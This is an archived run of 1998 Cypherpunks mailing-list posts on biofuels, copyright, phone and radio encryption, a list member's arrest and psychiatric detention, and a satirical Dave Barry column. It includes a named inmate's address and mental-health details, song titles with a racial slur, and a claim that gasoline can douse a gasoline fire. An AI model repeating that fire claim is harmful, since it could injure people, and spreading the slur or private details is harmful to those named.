But COMPRESSED_AIR + GASOLINE? 
Are you one nut short of a matched pair? 
Gasoline scares the hell out of me. It should you.
You don't live anywhere near me do you?
You should try baking bread instead.
Don't you think this conversation should be continued on some AOL forum? 

egads,
Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Thu, 10 Sep 1998 14:43:11 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Renewable Energy Stuff (was citizenship silliness) (fwd)
In-Reply-To: <199809101757.MAA04638@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.980910131736.441C-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 10 Sep 1998, Jim Choate wrote:

(risking /dev/nullification "is that like jury nullification?")

> Forwarded message:
> 
> > Date: Thu, 10 Sep 1998 11:26:47 -0600 (MDT)
> > From: Jim Burnes <jvb@ssds.com>
> > Subject: Renewable Energy Stuff (was citizenship silliness)
> 
> > Apparently hemp hurd gassification yields a fairly sizeable, renewable
> > amount of energy per acre.  Lemme see if I have the reference....
> 
> > Historically Hemp (Cannabis Sativa L.) has been a very high yielding plant
> > (Haney 1975).  Assuming that hemp produces up to 4 tons/acre seed plus 10
> > tons/acre stalks, Table 1 shows how many gallons of liquid fuel import could be
> > saved by each of the following proven biomass fuel conversion routes.
> > 
> >        Table 1. Conversion technologies for hemp stalks and hemp oil
> > 
> > CONVERSION                                           CONVERSION GASOLINE EQUIV
> > TECHNOLOGY                                             EFF - %    GAL/ACRE
> > 
> > 1  Ethanol from fermentation of hydrolyzed cellulose    20      200
> > 2  Digestion of whole stalks to methane                 50      500
> > 3  Producer gas from thermal gasification of stalks     85      1000
> > 4  Methanol from syngas from gasification of stalks     65      750
> > 5  Methanol from pyrolysis of stalks                    3       30
> > 
> > OIL SEEDS - 4 tons/acre
> > 
> > 6  Hemp Seed oil from Seeds, no conversion              100     300
> > 7  Biobioesel premium diesel fuel from hemp seed        90      270
> >     oil combined chemically with methanol
> 
> You're going to seriously claim that 1 gallon of hemp oil is equivalent to 3
> gallons of gasoline? I don't think so. I've seen hemp burn and it don't burn
> anywhere near that efficiently.

I think you misunderstood.  They are claiming "gasoline equivalent
gallons/acre" -- not that 1 gallon of hemp oil = 3 gallons of gasoline.
And were not talking about "burning" hemp in that sense.  In this
particular case were talking about hemp-based biodiesel.

> 
> I also notice it doesn't mention what it costs to raise that 4 tons/acre...
> 

Raising a full acre of hemp in that matter is something I don't have the
data on.  However, hemp is widely known as a low-maintenance crop -- that
translates little to no fertilizer.  After that we have the price of the
land/month, servicing loans on the farm equipment, labor costs, taxes,
energy, water etc.  Typical business overhead.   And for that 1000 galgas
eq/acre.

Certainly nothing out of the ordinary compared to the overhead in
the oil industry.  Although on a cost/gallon overhead I don't know.
Obviously this would take a least one growth season.

ObCrypto: In the case of TEOTWAWKI from Y2K, we are going to need
energy to run our computers and crypto on.  This might also be 
important to the people wanting to run a packet radio relay net.
(even though the then non-existant FCC might not like them
using crypto on a packet link)

I copied Tom Reed and Agua Das on this since they can address
the tech matters more thoroughly than I can.

Other than that we should probably take this off list.

Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 10 Sep 1998 15:54:21 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: ASL: RE: RE: RE: Copyright infringement (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A1928463C@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> Um, actualy not. It is actualy illegal for me to allow you to 
> borrow my books, CD's, albums, etc.

Uh, how so? Distribution copyright covers first-sale only, after that
the owner can lend or sell that item. If it were not for this, public
and private libraries could not exist.

This works for IP protected in tangible form, but falls down for
electronic IP. Software is not protected by distribution copyright, it
is instead licensed.

	Matt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 10 Sep 1998 19:07:38 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: Re: radio net (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284623@mossbay.chaffeyhomes.com>
Message-ID: <3.0.5.32.19980910135746.00c4c100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Matthew James Gering wrote:
>> Isn't there a similar ban on encryption-capable telephones and other
>> electronic devices (other than computers).

Not per se, though there _is_ still one major restriction -
the Defense Department gets a crack at patent applications,
so if you try to patent a crypto algorithm or crypto phone,
they can seize and classify your patent application and
working materials, using the excuse of "national security".
There was a case in the late 70s where somebody tried to patent
a wimpy analog scrambler for CB radios, and got it seized,
and a number of patent applications that got delayed a long time.

The RSA and Diffie-Hellman algorithms were published first,
and then the patents applied for, which works in the US and Canada
but makes them unpatentable in much of the rest of the world.
Steve Bellovin also got lots of legal advice about what order
to submit his patent applications and academic papers to
avoid the risk of getting them stolen by the Feds.

At 09:22 AM 9/10/98 -0700, Michael Motyka wrote:
>I suspect that the reason that there aren't any $99 cryptophones at
>Wal-Mart is that there really is not a significant market. The average
>person just doesn't care. And the consumer electronics business is so
>competitive and cost-sensitive that adding cost as a matter of principle
>is just not going to happen. 

Sure there are - my $150 cordless phone uses spread-spectrum,
partly for better sound quality, partly for better privacy,
and partly because it's simpler than picking individual channels.
I think it's probably the frequency-hopping form of spread-spectrum,
and the hopping speed is probably deliberately low because of
Federal pressure, but it's still reasonable voice privacy.
(And the digital phones that don't do spread-spectrum still advertise
using "digital" for privacy...)  My phone's a couple of years old;
you can probably get one for <$100 now.

Analog cell-phones aren't secure, but the digital cell-phones
on the market all provide cryptography for voice privacy,
though not all cellular service providers support it.
CDMA provides some inherent security, and it, TDMA, and GSM
all offer some encryption features - having prominent politicians
get caught talking to their girlfriends on their cellphones
has helped raise the awareness of privacy.
(The real price of a cell-phone in the US is hard to determine;
most range from about $100-700 without service activation,
and $0-400 with a service contract of typically 1 year.
But the low end's close to $99.)

>Oh, I suppose it's possible that anyone
>trying to introduce a product like this could run into LEA interference
>- endless audits, supplier problems, FCC approvals, you name it but lack
>of market is probably the simplest explanation.

The NSA and FBI did the best job of FUD they could arm-twisting the
US digital cellular standards committees into using wimpy encryption,
and GSM had its own set of wrangling that went on, producing a
primary algorithm that's weak, and a bunch of alternative algorithms
that are progressively weaker.  I probably couldn't break the GSM 
main code myself, but I know where to find people who can,
and just about any of the frequent readers of this list could break
some of the other systems used.

But that doesn't mean there isn't a strong demand for voice privacy -
just that the average consumer is satisfied having _some_ privacy,
enough to keep casual observers out and neighbors from stealing phone service,
and either doesn't believe the police would illegaly wiretap _him_,
or (more cynically) doesn't believe the cellphone is enough protection
if they do decide to target him.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 10 Sep 1998 13:37:28 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Renewable Energy Stuff (was citizenship silliness) (fwd)
Message-ID: <199809101859.NAA05373@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Brown, R Ken" <brownrk1@texaco.com>
> Subject: RE: Renewable Energy Stuff (was citizenship silliness) (fwd)
> Date: Thu, 10 Sep 1998 13:30:05 -0500

> > Now, back to more intersting discussion...
> 
> Definitely

> I'm begining to lose track of this thread. Are we talking about:

Well if we really, really must go back there....;)

What I was originaly looking to discuss was the impact of the injection of a
globaly available, economical, and effective replacement of petroleum
products on the international relationships. In particular the impact on
places like Isreal, Iran, US, etc. The only real relevance this has to
cypherpunks is from the economics side (why I've been trying to stay on
topic with the economics comments in parens) and how such a shift of
economic and industrial capabilites out of centralized and nationaly
controlled geographies might impact these same countries ability to remain
stable and the consequences of such.

Take Kuwait for example, the impact there would be devistating. And like a
domino effect (or want of a nail...) the repurcussions can be imagined to
run up the food chain. It is related, though not directly, to an issue that
I was engaged in several days ago about Gibson and the relationships of
governments, individuals, large companies, technology development, etc.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Thu, 10 Sep 1998 13:04:16 +0800
To: cypherpunks@cyberpass.net
Subject: [Fwd: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)]
Message-ID: <35F81543.365F22DD@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain

Sorry Jim,  slip of the wrist.

Hydroelectric turbines generate electric power. Feed this into the power
grid; well, maybe until the end of next year.  Maybe after 2000 we'll
see the un-nationalization of the national power grid.  Bay of Fundy is
>50 (?) square miles and tidal range is 25feet, one of the largest in
the world.

There have been discussions in the past to do likewise to the Bering
strait also.  Sorry about that whales.






To: sorens@workmail.com (Soren)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 10 Sep 1998 13:01:39 -0500 (CDT)
In-Reply-To: <35F7FF53.E57503AE@workmail.com> from "Soren" at Sep 10, 98 12:33:23 pm


Hi Soren,

Let's keep it on the list please...

> What about tidal hydro?  Bay of Fundy would be appropriate.

Figure the volume of the Bay from low tide and the highest tide. Then figure
the time needed to fill. From this you can calculate the maximum amount of
energy available.

If you live near the Bay I suppose it would work, won't help the folks 50
miles away though...

The goal is to find a renewable, generaly available source of energy so that
geographic proximity is irrelevant.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 10 Sep 1998 19:07:51 +0800
To: cypherpunks@cyberpass.net
Subject: Re: radio net (fwd)
In-Reply-To: <Pine.BSF.4.02A.9809090755430.270-100000@smarter.than.nu>
Message-ID: <3.0.5.32.19980910141331.00cd0b60@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> > The FCC prohibits the transmission of encrypted data via analog or digital
>> > signals by amateurs.
>> I'd love to see them try to enforce that.  What about chaffing and
>> winnowing?  Stego?  Transmission of random noise? ;)  Anyone have the text
>> of the actual rules concerning this?

Put it like this, it took the Feds a long time to be willing to accept
RTTY (Radio Teletype), because it used this 7(?)-bit ASCII CODE stuff.
On the other hand, they've relaxed a lot, as amateurs have largely become
computer hackers as well, equipment changed, Morse became less relevant....
As long as the ham user community doesn't get annoyed at you,
and you don't abuse the available bandwidth, you ought to be able to stego
a certain amount of traffic through the net, either using some sort of
PointyHairedBoss code, or low-order bits in GIFs, or whatever.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Sep 1998 14:19:43 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: ASL: RE: RE: RE: Copyright infringement (fwd)
Message-ID: <199809101938.OAA05621@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 10 Sep 1998 10:58:40 -0700
> From: Randy King <randyk@ims.com>
> Subject: Re: ASL: RE: RE: RE: Copyright infringement (fwd)

> Yes, but there is a difference.  It is legal to share a book.  Although it
> is copyrighted, you have the right to share it, at least in the US.  A letter
> is similar.  

Um, actualy not. It is actualy illegal for me to allow you to borrow my
books, CD's, albums, etc.

> been a court case on this yet?  Consider that companies have the right to
> make copies of all electronic mail coming through their Internet connections.

They own it. The employees are acting as agents of the employer and
therefore the employer, not the employee, is the owner of that traffic. So
if you send an email to some mailing list on the clock or with their
equipment then the traffic wasn't ever yours. The owner of a copyright can
make as many copies as they choose. The question is what do they do with the
email that comes from the other person using the other employers computer to
send the traffic....

As far as I know this hasn't made it into court in this exact form, however
it isn't likely too either. The precedences, and reasoning behind, the above
interpretation is well known and understood (at least by lawyers). 

> The issue is still very open on web sites.  The federal govt. is considering
> legislation (even as we type) that would make it illegal to copy any info
> from a web site written by a child (under 18).  Since viewing it makes a copy,
> it would be illegal to look at one without the writer's permission.  And 
> there is no obligation on the writer's part to divulge his age.  It is 
> obvious the feds don't understand the technology yet.  Again, I haven't had
> a chance to observe what has happened here in the past 6 or 8 months now.  

What is the bill number for this?

> Anyway, under your interpretation (which is probably the legal one 
> unfortunately), viewing a web site would be illegal without permission
> first.  Regardless of age.  

Not viewing it since the act of putting the data on the server is an implied
permission to view. However, the instant you make a permanent copy on your
hard-drive, that's not in the browsers short term cache, would be illegal.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Sep 1998 13:59:32 +0800
To: cypherpunks@toad.com
Subject: CJ Update
Message-ID: <199809101852.OAA28421@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



This from the AZ court docket of September 2 (note the out of sequence
entry date for the first item which was not there when we got the docket
on September 2 although the last two were):

8/25/98  6       ( FILED: 8/31/98) MINUTES:  before Mag Judge Nancy Fiora
                 Court telephonically notified that Carl Johnson is
                 defecating in his food tray, mutilating himself and writing
                 on the walls with his blood; court notes that dft spat upon
                 officers while awaiting his initial appearance[cc: all
                 cnsl] [6-1] re: minute entry [6-1] (sms)
                 [Entry date 09/02/98]

8/26/98  --      ORAL MOTION  for Psychiatric exam [0-0]  by Carl Edward
                 Johnson (sms) [Entry date 08/27/98]

8/26/98  5       ORDER  by Mag Judge Nancy Fiora granting  motion  for
                 Psychiatric exam [0-0]  Psychiatric examination ordered
                 for Carl Edward Johnson (sms) [Entry date 08/27/98]

----------

The AZ docket is archived at:

   http://jya.com/cej090298.htm

We also got today the Western Washington court docket which
shows when CJ's arrest warrant was issued and sealed, August 5:

   http://jya.com/cej082298.htm

We did a quick check of the WA court's cases for others (TCM and JYA)
who may have a sealed arrest warrant in force, but found none. But if 
there are any they may not be entered in the public record yet, as with
Carl's performance artistry.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Sep 1998 14:46:34 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
Message-ID: <199809102009.PAA06031@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 10 Sep 1998 13:15:09 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)

> 	Well, we used to dump 1000-3000 gallons of waste fuels into a pit,
> but I'd guess a decent size bucket or tray would work.
> 
> 	We had a smaller pit about 5x3 feet.

Youser, this is a plan to have every fireman and policeman in Austin show up
at my house Saturday afternoon isn't it (you crafty devil you)?...

I'll have to beg off since I live right in the middle of town any showy
demonstrations would be met with some neighborhood hostility I suspect. I
also don't believe the folks who own the land out in Elgin where my shop is
would go for that either, they're worried enough about my rocket engines and
Tesla coils...

> truck, we are talking no more than 10 or 20 gallons of fuel, tops.

> 	As I said, I know "just a bit" about this. I know that we would
> often get the bubbles from the detergent/water combo floating on top of
> everything, assisting in preventing a reflash by keeping a blanket between
> the air and the fuel/water.

Well in petroleum fires it isn't the liquid that burns but the very thin gas
layer just above it. You can actualy put a gas fire out with a wash of
gasoline. It's got to literaly be thrown on the fire and it needs to be
much larger than the quantity of material being burned. The soap/water
combo act as a layer reducing the outgassing and hence starving the fire of
fuel. It also lowers the temperature also helping the fire fighting
(remember temperature, fuel, oxidizer).

The bubbles of water than form, without the soap, sink to the bottem of the
spilled fuel and play no part in the fire/fire-fighting process.

> 	A "friend" of my fathers has been heating his home with it longer
> than I've known him, and that's about 20 years. Had his investment returned
> a LONG time ago.

Where does he live? What kind of house does he live in? What happens when we
expand his system to cover a small city of say 10k and include schools,
hospitals, business, etc.? What are the costs to install and operate
compared to traditional methods?

If he lives in a wood house in Alaska that won't work, if he lives in a mud
hut in the desert of Nevada all you need is a straw mat, a fan, and some
water to cool (yeah I know that's a literal exageration, but environment
does play a role).

There's this house here in Austin that is thermo-regulated by a fluid that
is pumped several hundred feet into a hill. The temperature in the core of
the hill stays about 68F year around, his house stays around 72 or so year
around as a consequence. Unfortunately, we don't have enough hills in Austin
(and if you've never been to Austin, we're nothing but hills) to take care
of the entire city. The heat from your neighbors house ends up in  your
house and vica versa.

> 	Question, when you said that there we'd need more land under
> production than we have available to produce enough CHO3 (IIRC) to replace
> oil, was that using current corn/soybean as a base material, or was that
> considering higher biomass stuff such as Hemp &etc. As well, where was that
> number from?

I suspect (and that's all it is) that when one takes the population growth
rate, requirements for water, transportation, housing, commercial
enterprises, waste, etc. there won't be enough arrible land left to grow
sufficient quantities of any plant material for anything except food.

There are issues with clathrates as well. Such as the fact these materials
are also the result of decay of animal matter and some percentage of
outgassing on the sea bed from deep geo-sources and ultimitely face the
same sort of issues with petroleum *if* the various curves don't match. The
question is, and I admit to have no hard data other than supposition, what
are/would be the curves if we used clathrates? Is the deposition rate
sufficient given a global extraction rate that was positive over time? Does
the increase in bio-mass as a result of population growth compensate
sufficiently?

I don't know and really would be hesitant to try to put real numbers to that
with what references I have available currently. And given my current
commitment level I'm not likely to spend a great deal of time working on it
to solidify the model.

I support diversity as well, unfortunately in some instances it's more
economical (with the inclusion of waste and other issues normaly ignored)
to go with a single solution on large scales. And that after all is the
issue, not one house out of 10,000 but all 10,000.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 10 Sep 1998 14:53:13 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Renewable Energy Stuff (was citizenship silliness) (fwd)
Message-ID: <199809102014.PAA06141@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 10 Sep 1998 13:46:02 -0600 (MDT)
> From: Jim Burnes <jvb@ssds.com>
> Subject: Re: Renewable Energy Stuff (was citizenship silliness) (fwd)

> I think you misunderstood.  They are claiming "gasoline equivalent
> gallons/acre" -- not that 1 gallon of hemp oil = 3 gallons of gasoline.
> And were not talking about "burning" hemp in that sense.  In this
> particular case were talking about hemp-based biodiesel.

How many gallons of gasoline can you raise on an acre?

Actualy the point I was trying to make is that it's comparing apples and
oranges. Until it's in a dollars/gallon for each of them format no real
worthwhile comparison can be made.

> Raising a full acre of hemp in that matter is something I don't have the
> data on.  However, hemp is widely known as a low-maintenance crop -- that
> translates little to no fertilizer.  After that we have the price of the
> land/month, servicing loans on the farm equipment, labor costs, taxes,
> energy, water etc.  Typical business overhead.   And for that 1000 galgas
> eq/acre.

Well don't forget crop rotation since the hemp is going to deplete the soil
if you simply grow three crops a year (which is possible this far south).
There is also the issue of water, hemp is a plant that needs lots of water
and is very sensitive to light levels/times, tempearture and pH. Hemp also
leeches nitrogen quite heavily.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alia Johnson <lodi@well.com>
Date: Thu, 10 Sep 1998 17:17:15 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: toto
In-Reply-To: <Pine.GSO.3.95.980903194936.773B-100000@well.com>
Message-ID: <Pine.GSO.3.96.980910150537.4506A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Declan, I did look up your stuff on the internet and thanks. I'm writing
to let you know that as of yesterday it has been 14 days since the court
(Judge Fior) ordered CJ moved to a psychiatric facility and they still
have not moved him. No one has heard from him for a few days. I talked to
him last week and he was okay but going through some hard times.

Bogart, the lawyer in Tucson, if he does not hear about CJ's move by
romorrow will request a hearing demanding what is going on. But the prison
is not cooperative in communicating even with him. Cj has apparently not
got it together to put me on the visitors list but he seems not to have
got my mail with my SS # etc. that the prison requires in order to let
visitors come. Then they spend ten days establishing that you're not a
criminal. Jesus.

Any the lawyer does think that he will be moved to Springfield. The family
is in terror that he will disappear into there or be committed for a long
time or for life. I have asked his Texas lawyer Dowling, just today,
whether we can retain him to represent Cj's interest with respect to what
is happening with the psychiatric evaluation, and haven't heard back from
him yet.

I am writing to ask you to help me: will you point me to information on
Springfield, its reputation, rules, accessibility of information on how
patients/inmates are being treated, etc.? Any information you can help me
locate would be very welcome.

Thanks.  Alia J

P.S. I saw the request for a picture/cd of music, whatever, I'll look.

Here are a couple of his porno country/western song titles:  "turning good
girls bad, most fun I ever had."  "I'll give you my heart, but my dick
belongs to mama." "there's no niggers left in Oakland, and all myh lies
are true."  C.J. also wrote some absolutely beautiful lyric songs, and of
course his classic "Jesus Lives in Garberville" about a dope raid on the
long-haired barefoot blissed-out guy living on the land....

What's your mailing address?

And thanks again for your help, and for contacting CJ. He was happy to
hear that we had talked. But I think he's not getting all his mail.

Alia

On Thu, 3 Sep 1998, Declan McCullagh wrote:

> I'd also be interested in seeing a copy of the RCMP page, on his old
> sympatico.ca/carljohn account.
> 
> -Declan
> 
> 
> On Thu, 3 Sep 1998, John Young wrote:
> 
> > I tried today to speak to Toto's attorney in Tucson, John Bogart 
> > (520-624-8196), and another in Texas supposedly involved, 
> > Larry Dowling (512-892-3393), but neither returned messages. 
> > Bogart's secretary later said he did not want to talk -- to me at least.
> > 
> > Next, I called the jail (520-868-3668) to get it's policy on 
> > contacting Toto. No incoming calls, he can call out. Mail to 
> > him okay:
> > 
> >    Carl Edward Johnson
> >    Inmate Number 05 98 7196
> >    CCA
> >    1155 North Dinal Parkway
> >    Florence, AZ 85232
> > 
> > Other reports, leads or news welcome. Anybody got a photo,
> > a CD of his music or hallelujahs? A mirror of his RCMP taunt?
> > 
> > 
> > 
> > 
> > 
> > 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 10 Sep 1998 14:40:44 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Dave Barry:  "Funny Money"
Message-ID: <v04011716b21dd8358230@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Thu, 10 Sep 1998 11:39:07 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Dave Barry:  "Funny Money"
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Miami Herald
http://www.herald.com/archive/barry/archive/98sep06.htm

Published Friday, September 4, 1998, in the Miami Herald

Funny Money  By DAVE BARRY

 Recently I received a press release from the U.S. Treasury Department.
Naturally my first move was to verify, via chemical analysis, that it was
genuine. There has been a sharp increase in the number of counterfeit
Treasury Department press releases, as an embarrassed CNN found out last
month when it reported, incorrectly, that Federal Reserve Board Chairman
Alan Greenspan does all the voices on the popular cartoon show South Park.
(In fact, he does only Kenny and Mr. Hankey.)

 But this particular press release turned out to be authentic; it announced
that, this fall, we'll be seeing a new, redesigned $20 bill. This is part
of an anti-counterfeiting program to redesign all of our old currency,
which has become too easy to duplicate with modern color photocopiers -- a
fact that was made all too clear when the Xerox Corp., in its 1997 annual
report, reported profits of ``$850 trillion, mostly in 50s.''

 Why does counterfeit money represent a threat to the nation? And how can
we, as consumers, be sure that we have spelled ``counterfeit'' correctly?
To answer these questions, we need to understand exactly what money is, and
what makes it valuable.

 Back in ancient times, when people were much stupider than they are today,
there was no such thing as money. People transacted business by trading
actual, physical things. For example, if you sold a cow, the buyer would
pay for it by giving you, say, 14 physical ducks. Even in those days, that
was a lot of ducks to be carrying around, and the bank wouldn't let you
deposit them, because they fought with the chickens. Also the automatic
teller machines were disgusting.

 Finally, the ancient Egyptians got sick of this and invented the first
unit of paper currency, called the `simoleon.'' The way the Egyptians
explained the concept to their trading partners was: ``For your
convenience, we're going to start paying you with these pieces of paper,
which are valuable because they have a picture of Ulysses Grant.'' The
trading partners were not crazy about this concept, but they went along
with it, because the Egyptians had also invented spears.

 Today, the basic principle remains the same: We trust money because our
government stands behind it. A counterfeit $20 bill is a worthless piece of
paper backed by nothing; whereas a real $20 bill, issued by the Treasury
Department, has value, because any time you want, you can take it to Fort
Knox, site of the federal gold bullion depository, and exchange it, no
questions asked, for a duck. Try it yourself! If they give you any trouble,
mention my name, Art Buchwald.

 But the point is that, starting this fall, you're going to start seeing a
drastically redesigned $20 bill. Among the major changes are:

 -- To thwart would-be photocopiers, instead of saying ``TWENTY DOLLARS,''
the new $20 bills say ``FIFTEEN DOLLARS.''

 -- The Nike swoosh has been enlarged.

 -- The engraved portrait of Andrew Jackson has been given a new,
up-to-date hairstyle, patterned, according to the Treasury Department press
release, ``after Barry Manilow.'' President Jackson also has been given a
vivacious new facial expression that seems to say: ``I am looking good, and
I am READY TO PARTY with the engraved portraits on other currency
denominations!''

 -- On the back of the bill, in the engraving of the White House, on the
far right-hand side, in the engraved shrubbery, is a tiny crouching
engraving of Kenneth Starr.

 -- For verification purposes, the new bill is impregnated with plutonium
particles that emit a distinctive pattern of atomic radiation. ``This poses
absolutely no health danger whatsoever to humans,'' notes the Treasury
Department press release, which adds: ``Do not ever put the bill in your
pocket.''

 These improvements, plus the top-secret ``auto-detonate'' feature that I
am not allowed to mention in this column, will make the new $20 bill --
which is costing the government $348.50 per unit to manufacture -- the most
advanced anti-counterfeit currency in the world. But the whole effort will
be wasted unless you, the consumer, do your part by keeping a sharp eye out
for ``funny money.''

 The Treasury Department is asking that you regularly inspect all of your
bills, of all denominations. If you notice anything suspicious -- according
to the press release, this especially means ``foreign words, men in wigs,
strings of numbers, a greenish coloring or some kind of weird eyeball
floating over a pyramid'' -- you should immediately put the suspect bills
into an envelope and mail them to: The U.S. Treasury Department
Anti-Counterfeit Task Force, c/o Dave Barry, The Miami Herald, Miami, Fla.
33132. Please help. Only by joining together to fight this thing can we, as
a nation, buy me a giant mansion with servants and a lake. It will have
ducks. Thank you.

 Copyright (c) 1998 The Miami Herald

-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 10 Sep 1998 14:47:01 +0800
To: cypherpunks@cyberpass.net
Subject: Re: oil, greens, recycling, and poly-ticks.
Message-ID: <199809101948.PAA09931@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: John Young <jya@pipeline.com>
   >
   >   8/25/98   Carl Johnson is defecating in his food tray...

No shit!

   >   From: Ray Arachelian <sunder@brainlink.com>
   >
   >   Every toilet in our apt building was exchanged for one that supposedly
   >   saves water... it now takes an average of three flushes to sink a
   >   bowlful of turds... 

No shit!

   >   My math says that's a lot more wasted water than the single flush
   >   of the old toilet.

Solution: http://yournewhouse.com/mainFR3.htm
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 10 Sep 1998 14:56:00 +0800
To: cypherpunks@cyberpass.net
Subject: DCSB: Burning the Jolly Roger; Internet Anti-Piracy Technology
Message-ID: <v0401171ab21dddbccef6@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Thu, 10 Sep 1998 15:38:33 -0400
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
